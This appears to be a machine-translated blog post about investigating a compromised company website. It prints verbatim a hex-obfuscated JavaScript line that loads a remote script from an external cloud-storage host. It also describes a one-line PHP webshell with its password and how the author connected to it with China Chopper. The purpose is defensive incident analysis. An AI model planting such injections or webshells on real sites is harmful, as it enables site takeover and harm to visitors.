Yesterday, the manager came again and said that the company's website was hung up
Since I don't know how to penetrate, I can only feel it blindly
What do you have in the front page file?
The three major labels are as follows:
There is also a section of JS code, copied to Baidu, found that this code is basically in the black site, however, I do not know what things
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x31\x39\x30\x30\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
For hexadecimal encoding, the result after converting the Unicode code is as follows:
If you look at it carelessly, you may output the return value of this JS file on the page.
At the bottom of the page, I found a bunch of links to PHP files
And then I'll take a look at where these PHP files are
It turns out that these documents are the same, but the names are different. I have a look at this PHP code again. It means to read the contents in the address of reads passed to the user-defined method and output it.
Then I was very decisive to open this address, but because the company's website was hacked for too long, it was found that this address is also very unfortunate 404
Check through the log
If you know where the web page has been linked with a black chain, you have to check how you have been authorized.
First of all, it is impossible to guess the FTP password. FTP passwords of all websites of the company are randomly generated and mixed with upper and lower case numbers.
Then I downloaded all the visit logs of the website, but I couldn't find it because of the blackout time.
Next, I wanted to check the operation log in the background, but I found that the background was written by my company's predecessors, which was not so perfect, let alone the operation log.
Truth without solution
How about safety dog?
Since they do not have the ability to check, then use software to check where the back door is.
Take a look at the website safety dog: http://free.safedog.cn/website_ safedog.html
(@ please pay for the advertising fee of safety dog)
After downloading all the files of the website, a scan found a lot of girls.
Because I used to use a word Trojan horse to play a simple invasion, so I randomly opened the second scan results, but really confirmed the eyes!!!
Next, the Trojan file is opened. There are only two lines of code exposed in the whole file, and the rest are all commented out code (even to disguise as a dream weaving CMS file is also powerful).
Copy these two pieces of code to Baidu, see what this is?
It's really a word. Baidu after knowing this sentence, Trojan horse password is 4.
Well, now that you know it's a sentence, let's use some of the trivial things I used to have a try with the legendary Chinese kitchen knife?
Sure enough, I got all the rights of the website
To be continued
There are too many things to say about penetration, or do a good job in the security protection of the website is the most important, for the security loopholes and Trojan files found out, you should delete in time, do not let bad corn have an opportunity to take advantage of it!!!
As for the company's website vulnerabilities emmmmm… . still looking~